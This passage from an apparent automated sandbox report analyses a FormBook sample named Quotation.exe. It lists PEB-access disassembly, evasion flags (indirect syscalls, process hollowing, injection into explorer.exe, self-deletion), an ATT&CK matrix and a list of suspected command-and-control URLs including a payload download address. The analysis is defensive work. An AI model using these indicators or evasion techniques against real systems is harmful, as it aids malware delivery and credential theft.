      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E60770 mov eax, dword ptr fs:[00000030h]3_2_33E60770
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E60770 mov eax, dword ptr fs:[00000030h]3_2_33E60770
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E60770 mov eax, dword ptr fs:[00000030h]3_2_33E60770
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E60770 mov eax, dword ptr fs:[00000030h]3_2_33E60770
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E60770 mov eax, dword ptr fs:[00000030h]3_2_33E60770
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E60770 mov eax, dword ptr fs:[00000030h]3_2_33E60770
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E60770 mov eax, dword ptr fs:[00000030h]3_2_33E60770
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E60770 mov eax, dword ptr fs:[00000030h]3_2_33E60770
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E60770 mov eax, dword ptr fs:[00000030h]3_2_33E60770
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E60770 mov eax, dword ptr fs:[00000030h]3_2_33E60770
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E60770 mov eax, dword ptr fs:[00000030h]3_2_33E60770
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E60770 mov eax, dword ptr fs:[00000030h]3_2_33E60770
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8674D mov esi, dword ptr fs:[00000030h]3_2_33E8674D
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8674D mov eax, dword ptr fs:[00000030h]3_2_33E8674D
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8674D mov eax, dword ptr fs:[00000030h]3_2_33E8674D
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E63740 mov eax, dword ptr fs:[00000030h]3_2_33E63740
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E63740 mov eax, dword ptr fs:[00000030h]3_2_33E63740
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E63740 mov eax, dword ptr fs:[00000030h]3_2_33E63740
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E50750 mov eax, dword ptr fs:[00000030h]3_2_33E50750
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED4755 mov eax, dword ptr fs:[00000030h]3_2_33ED4755
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92750 mov eax, dword ptr fs:[00000030h]3_2_33E92750
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E92750 mov eax, dword ptr fs:[00000030h]3_2_33E92750
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F23749 mov eax, dword ptr fs:[00000030h]3_2_33F23749
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E53720 mov eax, dword ptr fs:[00000030h]3_2_33E53720
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6F720 mov eax, dword ptr fs:[00000030h]3_2_33E6F720
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6F720 mov eax, dword ptr fs:[00000030h]3_2_33E6F720
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6F720 mov eax, dword ptr fs:[00000030h]3_2_33E6F720
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8C720 mov eax, dword ptr fs:[00000030h]3_2_33E8C720
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8C720 mov eax, dword ptr fs:[00000030h]3_2_33E8C720
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F2B73C mov eax, dword ptr fs:[00000030h]3_2_33F2B73C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F2B73C mov eax, dword ptr fs:[00000030h]3_2_33F2B73C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F2B73C mov eax, dword ptr fs:[00000030h]3_2_33F2B73C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F2B73C mov eax, dword ptr fs:[00000030h]3_2_33F2B73C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8273C mov eax, dword ptr fs:[00000030h]3_2_33E8273C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8273C mov ecx, dword ptr fs:[00000030h]3_2_33E8273C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8273C mov eax, dword ptr fs:[00000030h]3_2_33E8273C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E49730 mov eax, dword ptr fs:[00000030h]3_2_33E49730
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E49730 mov eax, dword ptr fs:[00000030h]3_2_33E49730
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1972B mov eax, dword ptr fs:[00000030h]3_2_33F1972B
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECC730 mov eax, dword ptr fs:[00000030h]3_2_33ECC730
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E85734 mov eax, dword ptr fs:[00000030h]3_2_33E85734
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0F72E mov eax, dword ptr fs:[00000030h]3_2_33F0F72E
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5973A mov eax, dword ptr fs:[00000030h]3_2_33E5973A
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5973A mov eax, dword ptr fs:[00000030h]3_2_33E5973A
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E57703 mov eax, dword ptr fs:[00000030h]3_2_33E57703
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E55702 mov eax, dword ptr fs:[00000030h]3_2_33E55702
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E55702 mov eax, dword ptr fs:[00000030h]3_2_33E55702
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8C700 mov eax, dword ptr fs:[00000030h]3_2_33E8C700
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E50710 mov eax, dword ptr fs:[00000030h]3_2_33E50710
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8F71F mov eax, dword ptr fs:[00000030h]3_2_33E8F71F
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8F71F mov eax, dword ptr fs:[00000030h]3_2_33E8F71F
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E80710 mov eax, dword ptr fs:[00000030h]3_2_33E80710
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0D6F0 mov eax, dword ptr fs:[00000030h]3_2_33F0D6F0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE36EE mov eax, dword ptr fs:[00000030h]3_2_33EE36EE
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE36EE mov eax, dword ptr fs:[00000030h]3_2_33EE36EE
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE36EE mov eax, dword ptr fs:[00000030h]3_2_33EE36EE
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE36EE mov eax, dword ptr fs:[00000030h]3_2_33EE36EE
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE36EE mov eax, dword ptr fs:[00000030h]3_2_33EE36EE
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EE36EE mov eax, dword ptr fs:[00000030h]3_2_33EE36EE
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7D6E0 mov eax, dword ptr fs:[00000030h]3_2_33E7D6E0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7D6E0 mov eax, dword ptr fs:[00000030h]3_2_33E7D6E0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E836EF mov eax, dword ptr fs:[00000030h]3_2_33E836EF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED06F1 mov eax, dword ptr fs:[00000030h]3_2_33ED06F1
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED06F1 mov eax, dword ptr fs:[00000030h]3_2_33ED06F1
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECE6F2 mov eax, dword ptr fs:[00000030h]3_2_33ECE6F2
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECE6F2 mov eax, dword ptr fs:[00000030h]3_2_33ECE6F2
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECE6F2 mov eax, dword ptr fs:[00000030h]3_2_33ECE6F2
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECE6F2 mov eax, dword ptr fs:[00000030h]3_2_33ECE6F2
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5B6C0 mov eax, dword ptr fs:[00000030h]3_2_33E5B6C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5B6C0 mov eax, dword ptr fs:[00000030h]3_2_33E5B6C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5B6C0 mov eax, dword ptr fs:[00000030h]3_2_33E5B6C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5B6C0 mov eax, dword ptr fs:[00000030h]3_2_33E5B6C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5B6C0 mov eax, dword ptr fs:[00000030h]3_2_33E5B6C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5B6C0 mov eax, dword ptr fs:[00000030h]3_2_33E5B6C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E816CF mov eax, dword ptr fs:[00000030h]3_2_33E816CF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8A6C7 mov ebx, dword ptr fs:[00000030h]3_2_33E8A6C7
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8A6C7 mov eax, dword ptr fs:[00000030h]3_2_33E8A6C7
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0F6C7 mov eax, dword ptr fs:[00000030h]3_2_33F0F6C7
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F116CC mov eax, dword ptr fs:[00000030h]3_2_33F116CC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F116CC mov eax, dword ptr fs:[00000030h]3_2_33F116CC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F116CC mov eax, dword ptr fs:[00000030h]3_2_33F116CC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F116CC mov eax, dword ptr fs:[00000030h]3_2_33F116CC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4D6AA mov eax, dword ptr fs:[00000030h]3_2_33E4D6AA
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4D6AA mov eax, dword ptr fs:[00000030h]3_2_33E4D6AA
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8C6A6 mov eax, dword ptr fs:[00000030h]3_2_33E8C6A6
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E476B2 mov eax, dword ptr fs:[00000030h]3_2_33E476B2
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E476B2 mov eax, dword ptr fs:[00000030h]3_2_33E476B2
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E476B2 mov eax, dword ptr fs:[00000030h]3_2_33E476B2
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E866B0 mov eax, dword ptr fs:[00000030h]3_2_33E866B0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED368C mov eax, dword ptr fs:[00000030h]3_2_33ED368C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED368C mov eax, dword ptr fs:[00000030h]3_2_33ED368C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED368C mov eax, dword ptr fs:[00000030h]3_2_33ED368C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED368C mov eax, dword ptr fs:[00000030h]3_2_33ED368C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E54690 mov eax, dword ptr fs:[00000030h]3_2_33E54690
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E54690 mov eax, dword ptr fs:[00000030h]3_2_33E54690
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8A660 mov eax, dword ptr fs:[00000030h]3_2_33E8A660
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8A660 mov eax, dword ptr fs:[00000030h]3_2_33E8A660
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E89660 mov eax, dword ptr fs:[00000030h]3_2_33E89660
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E89660 mov eax, dword ptr fs:[00000030h]3_2_33E89660
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E82674 mov eax, dword ptr fs:[00000030h]3_2_33E82674
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1866E mov eax, dword ptr fs:[00000030h]3_2_33F1866E
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1866E mov eax, dword ptr fs:[00000030h]3_2_33F1866E
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6C640 mov eax, dword ptr fs:[00000030h]3_2_33E6C640
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6E627 mov eax, dword ptr fs:[00000030h]3_2_33E6E627
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F626 mov eax, dword ptr fs:[00000030h]3_2_33E4F626
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F626 mov eax, dword ptr fs:[00000030h]3_2_33E4F626
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F626 mov eax, dword ptr fs:[00000030h]3_2_33E4F626
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F626 mov eax, dword ptr fs:[00000030h]3_2_33E4F626
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F626 mov eax, dword ptr fs:[00000030h]3_2_33E4F626
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F626 mov eax, dword ptr fs:[00000030h]3_2_33E4F626
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F626 mov eax, dword ptr fs:[00000030h]3_2_33E4F626
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F626 mov eax, dword ptr fs:[00000030h]3_2_33E4F626
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4F626 mov eax, dword ptr fs:[00000030h]3_2_33E4F626
      Source: C:\Users\user\Desktop\Quotation.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Found direct / indirect Syscall (likely to bypass EDR)
      Source: C:\Users\user\Desktop\Quotation.exeNtClose: Indirect: 0x33C5A56C
      Source: C:\Users\user\Desktop\Quotation.exeNtQueueApcThread: Indirect: 0x33C5A4F2Jump to behavior
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\user\Desktop\Quotation.exeThread register set: target process: 1028Jump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 1028Jump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Users\user\Desktop\Quotation.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Sample uses process hollowing technique
      Source: C:\Users\user\Desktop\Quotation.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: BC0000Jump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Quotation.exe"Jump to behavior
      Source: explorer.exe, 00000005.00000002.3262974306.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3094424197.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3094747500.0000000009BB3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
      Source: explorer.exe, 00000005.00000002.3258112322.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2520256352.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000005.00000002.3258112322.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.3259689305.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2520256352.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000005.00000002.3258112322.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2520256352.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000005.00000002.3258112322.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2520256352.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000005.00000000.2519828963.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3257532764.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		1
      Rootkit      		1
      Credential API Hooking      		221
      Security Software Discovery      		Remote Services1
      Credential API Hooking      		1
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Shared Modules      		Boot or Logon Initialization Scripts412
      Process Injection      		1
      Masquerading      		LSASS Memory2
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Archive Collected Data      		1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      Abuse Elevation Control Mechanism      		2
      Virtualization/Sandbox Evasion      		Security Account Manager2
      Process Discovery      		SMB/Windows Admin Shares1
      Clipboard Data      		2
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
      DLL Side-Loading      		1
      Access Token Manipulation      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture112
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script412
      Process Injection      		LSA Secrets2
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Deobfuscate/Decode Files or Information      		Cached Domain Credentials23
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      Abuse Elevation Control Mechanism      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
      Obfuscated Files or Information      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
      DLL Side-Loading      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1554157 Sample: Quotation.exe Startdate: 12/11/2024 Architecture: WINDOWS Score: 100 30 www.rbis.site 2->30 32 www.alkak.cam 2->32 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Antivirus detection for URL or domain 2->48 50 8 other signatures 2->50 11 Quotation.exe 4 37 2->11         started        signatures3 process4 file5 28 C:\Users\user\AppData\Local\...\System.dll, PE32 11->28 dropped 60 Tries to detect virtualization through RDTSC time measurements 11->60 62 Switches to a custom stack to bypass stack traces 11->62 15 Quotation.exe 6 11->15         started        signatures6 process7 dnsIp8 34 94.141.120.137, 49836, 80 UNITLINE_RST_NET1RostovnaDonuRU Russian Federation 15->34 36 Modifies the context of a thread in another process (thread injection) 15->36 38 Maps a DLL or memory area into another process 15->38 40 Sample uses process hollowing technique 15->40 42 2 other signatures 15->42 19 explorer.exe 51 1 15->19 injected signatures9 process10 process11 21 colorcpl.exe 19->21         started        signatures12 52 Modifies the context of a thread in another process (thread injection) 21->52 54 Maps a DLL or memory area into another process 21->54 56 Tries to detect virtualization through RDTSC time measurements 21->56 58 Switches to a custom stack to bypass stack traces 21->58 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Quotation.exe17%VirustotalBrowse
      Quotation.exe100%AviraHEUR/AGEN.1333748

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.zrk148.inkReferer:0%Avira URL Cloudsafe
      http://www.owboyaero.netReferer:0%Avira URL Cloudsafe
      http://www.ulunguwethu.store/hy29/www.n6n.xyz0%Avira URL Cloudsafe
      http://www.eifeigou.topReferer:0%Avira URL Cloudsafe
      http://www.unnify.net/hy29/0%Avira URL Cloudsafe
      http://www.alkak.camReferer:0%Avira URL Cloudsafe
      http://www.ylosnackpark.online/hy29/0%Avira URL Cloudsafe
      http://www.nline-advertising-18349.bond0%Avira URL Cloudsafe
      http://www.ylosnackpark.online0%Avira URL Cloudsafe
      http://www.rbis.site0%Avira URL Cloudsafe
      http://www.eifeigou.top/hy29/0%Avira URL Cloudsafe
      http://www.84jys301.topReferer:0%Avira URL Cloudsafe
      http://www.ylosnackpark.onlineReferer:0%Avira URL Cloudsafe
      http://www.dfg3n489.cyou/hy29/0%Avira URL Cloudsafe
      http://94.141.120.137/0%Avira URL Cloudsafe
      http://www.rbis.site/hy29/0%Avira URL Cloudsafe
      http://www.ulbcenter.shop/hy29/www.ulunguwethu.store0%Avira URL Cloudsafe
      http://www.yaanincma.store/hy29/concg0%Avira URL Cloudsafe
      http://www.dfg3n489.cyou0%Avira URL Cloudsafe
      http://www.dfg3n489.cyouReferer:0%Avira URL Cloudsafe
      http://www.nline-advertising-18349.bondReferer:0%Avira URL Cloudsafe
      http://www.eifeigou.top0%Avira URL Cloudsafe
      http://www.veriox.xyzReferer:0%Avira URL Cloudsafe
      http://www.n6n.xyz/hy29/0%Avira URL Cloudsafe
      http://www.ulunguwethu.store0%Avira URL Cloudsafe
      http://www.unnify.netReferer:0%Avira URL Cloudsafe
      http://www.84jys301.top/hy29/www.ustdoit.store0%Avira URL Cloudsafe
      http://94.141.120.137/qVMezflLJCc194.bin100%Avira URL Cloudmalware
      http://www.ylosnackpark.online/hy29/www.eifeigou.top0%Avira URL Cloudsafe
      http://www.n6n.xyz/hy29/www.nline-advertising-18349.bond0%Avira URL Cloudsafe
      http://www.owboyaero.net/hy29/www.84jys301.top0%Avira URL Cloudsafe
      http://www.ulbcenter.shopReferer:0%Avira URL Cloudsafe
      http://www.veriox.xyz/hy29/0%Avira URL Cloudsafe
      http://94.141.120.137/s$#&0%Avira URL Cloudsafe
      http://www.zrk148.ink/hy29/0%Avira URL Cloudsafe
      http://www.dfg3n489.cyou/hy29/www.yaanincma.store0%Avira URL Cloudsafe
      www.84jys301.top/hy29/0%Avira URL Cloudsafe
      http://www.alkak.cam/hy29/www.ulbcenter.shop0%Avira URL Cloudsafe
      http://www.ulbcenter.shop0%Avira URL Cloudsafe
      http://www.ustdoit.store/hy29/www.dfg3n489.cyou0%Avira URL Cloudsafe
      http://www.yaanincma.storeReferer:0%Avira URL Cloudsafe
      http://www.yaanincma.store/hy29/0%Avira URL Cloudsafe
      http://www.n6n.xyz0%Avira URL Cloudsafe
      http://www.n6n.xyzReferer:0%Avira URL Cloudsafe
      http://www.ustdoit.store0%Avira URL Cloudsafe
      http://94.141.120.137/qVMezflLJCc194.bins0%Avira URL Cloudsafe
      http://www.nline-advertising-18349.bond/hy29/www.zrk148.ink0%Avira URL Cloudsafe
      http://www.alkak.cam0%Avira URL Cloudsafe
      http://www.veriox.xyz/hy29/www.owboyaero.net0%Avira URL Cloudsafe
      http://www.ulunguwethu.store/hy29/0%Avira URL Cloudsafe
      http://www.ulbcenter.shop/hy29/0%Avira URL Cloudsafe
      http://www.zrk148.ink/hy29/www.unnify.net0%Avira URL Cloudsafe
      http://www.eifeigou.top/hy29/www.veriox.xyz0%Avira URL Cloudsafe
      http://www.ustdoit.store/hy29/0%Avira URL Cloudsafe
      http://www.84jys301.top/hy29/0%Avira URL Cloudsafe
      http://www.ustdoit.storeReferer:0%Avira URL Cloudsafe
      http://www.veriox.xyz0%Avira URL Cloudsafe
      http://www.unnify.net/hy29/www.ylosnackpark.online0%Avira URL Cloudsafe
      http://www.rbis.siteReferer:0%Avira URL Cloudsafe
